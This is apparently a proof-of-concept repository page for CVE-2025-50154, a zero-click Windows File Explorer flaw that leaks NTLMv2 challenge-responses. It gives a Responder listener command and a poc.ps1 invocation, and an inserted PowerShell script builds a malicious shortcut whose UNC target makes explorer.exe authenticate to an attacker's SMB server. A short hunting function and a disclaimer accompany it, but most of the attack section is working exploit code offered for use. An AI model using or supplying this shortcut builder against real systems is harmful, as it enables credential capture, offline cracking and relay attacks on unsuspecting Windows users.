POC details: bd2e26a6bc58677f6fdcb1be67de7b2f275ca106

Related vulnerability
Title: Microsoft Windows File Explorer information disclosure vulnerability (CVE-2025-50154)
Description: Microsoft Windows File Explorer is a file manager application from the US company Microsoft. Microsoft Windows File Explorer contains an information disclosure vulnerability that an attacker can exploit to obtain sensitive information. The following products and versions are affected: Windows 10 Version 21H2 for ARM64-based Systems, Windows 10 Version 21H2 for x64-based Systems, Windows 11 Version 22H2 for A
Description
POC for CVE-2025-50154, a zero-day vulnerability in Windows File Explorer that discloses NTLMv2-SSP hashes without user interaction. It bypasses the security patch for CVE-2025-24054.
Introduction
# CVE-2025-50154

# Windows File Explorer Zero Click NTLMv2-SSP Hash Disclosure
By [Ruben Enkaoua](https://x.com/rubenlabs) and [Cymulate](https://cymulate.com/)

[Original Blog: Zero Click, One NTLM: Microsoft Security Patch Bypass (CVE-2025-50154)](https://cymulate.com/blog/zero-click-one-ntlm-microsoft-security-patch-bypass-cve-2025-50154/)

#### Description
While Microsoft released a security update addressing an icon-based NTLM hash disclosure vulnerability, I discovered a bypass that still allows an attacker to retrieve NTLMv2-SSP hashes without user interaction.

The original vulnerability, recently patched, was a zero-click NTLM hash disclosure triggered when explorer.exe rendered the icon of a .LNK shortcut file whose icon was hosted on a remote SMB server. After the patch, explorer.exe no longer loads icons from remote SMB paths, which closes that automatic disclosure.

By crafting a .LNK file with:

+ the default icon taken from shell32.dll, and
+ a target path pointing to a binary (PE) file hosted on a remote SMB share,

the explorer.exe process will still fetch the remote file in order to extract the PE's icon from its RT_GROUP_ICON and RT_ICON resources. Because that SMB connection is authenticated with the browsing user's credentials, the NTLMv2-SSP response reaches the attacker's server exactly as it did before the patch.

#### Steps
Start Responder on the attacker's server:

```bash
responder -I <interface> -v
```

Craft the malicious LNK with PowerShell on a different machine, then deliver it to the victim (malicious download, SMB upload, ...):

```powershell
# Replace the values with the output path, the Responder server IP, the share name and the file name on the share.
# Note: it can take 20 to 30 seconds for the request to arrive.
.\poc.ps1 -path "C:\users\user\desktop" -ip "<serverIP>" -share "<share>" -file "<payload.exe>"
```

When the victim's explorer.exe renders the folder containing the shortcut, it downloads the remote target automatically to look for RT_GROUP_ICON and RT_ICON entries in the PE's .rsrc section; the SMB session it opens carries an NTLMv2-SSP authentication, which Responder logs. What is captured is the NTLMv2 challenge-response (Net-NTLMv2), not the account's NT hash: it can be cracked offline against the user's password or, where SMB signing is not enforced, relayed, but it cannot be used directly for pass-the-hash.
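The shortcut described in the steps above, written out as an added example. This is not the repository's poc.ps1 and not Cymulate's code (the page does not show how poc.ps1 writes the file): it uses the WScript.Shell COM object to set the two properties the README names (a local shell32.dll icon and a UNC target on an SMB share), and adds a read-back function that doubles as a hunting check for .LNK files whose target is a UNC path. The server address, share, file name and icon index are placeholders, and whether a given Windows build still fetches the target's icon depends on its patch level.

```powershell
<#
Added example, not the repository's poc.ps1. Builds a .LNK with a local
shell32.dll icon and a UNC target (the two properties the README describes)
via WScript.Shell, then reads shortcuts back to report UNC targets. Server,
share, file and icon index are placeholders.
#>

function New-RemoteTargetLnk {
    param(
        [Parameter(Mandatory)] [string] $Path,    # where to write the .lnk
        [Parameter(Mandatory)] [string] $Server,  # SMB server running Responder (placeholder)
        [Parameter(Mandatory)] [string] $Share,   # share name (placeholder)
        [Parameter(Mandatory)] [string] $File,    # PE file on the share (placeholder)
        [string] $IconLocation = "$env:SystemRoot\System32\shell32.dll,1"   # local icon, index is arbitrary
    )
    $target = "\\$Server\$Share\$File"
    $wsh = New-Object -ComObject WScript.Shell
    $lnk = $wsh.CreateShortcut($Path)
    $lnk.TargetPath   = $target        # remote PE: explorer fetches it to read RT_GROUP_ICON / RT_ICON
    $lnk.IconLocation = $IconLocation  # icon path stays local, so the patched remote-icon check is not involved
    $lnk.Save()
    return $Path
}

function Get-LnkWithUncTarget {
    # Hunting check: list .lnk files under $Directory whose stored TargetPath is a UNC path.
    # CreateShortcut on an existing file only loads it; nothing is written unless Save() is called.
    param([Parameter(Mandatory)] [string] $Directory)
    $wsh = New-Object -ComObject WScript.Shell
    Get-ChildItem -Path $Directory -Filter '*.lnk' -File -Recurse -ErrorAction SilentlyContinue |
        ForEach-Object {
            $sc = $wsh.CreateShortcut($_.FullName)
            if ($sc.TargetPath -match '^\\\\[^\\]+\\') {   # \\server\... prefix
                [pscustomobject]@{
                    Lnk    = $_.FullName
                    Target = $sc.TargetPath
                    Icon   = $sc.IconLocation
                }
            }
        }
}

# Usage with placeholder values: build the shortcut in a scratch folder, then confirm its target is remote.
$scratch = Join-Path $env:TEMP 'lnk-poc'
New-Item -ItemType Directory -Path $scratch -Force | Out-Null
New-RemoteTargetLnk -Path (Join-Path $scratch 'Document.lnk') -Server '192.0.2.10' -Share 'share' -File 'payload.exe'
Get-LnkWithUncTarget -Directory $scratch | Format-Table -AutoSize
```

Run the read-back check from a shell, not from an Explorer window: opening the scratch folder in Explorer is precisely the action that makes explorer.exe reach out to the UNC target and authenticate, so do it only on the test victim whose traffic you intend Responder to capture.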

#### Notes
This code is for educational and research purposes only.
The author takes no responsibility for any misuse of this code.
File snapshot

```
/data/pocs/bd2e26a6bc58677f6fdcb1be67de7b2f275ca106
├── LICENSE   (1.5K)
├── poc.ps1   (1.6K)
└── README.md (2.0K)

0 directories, 3 files
```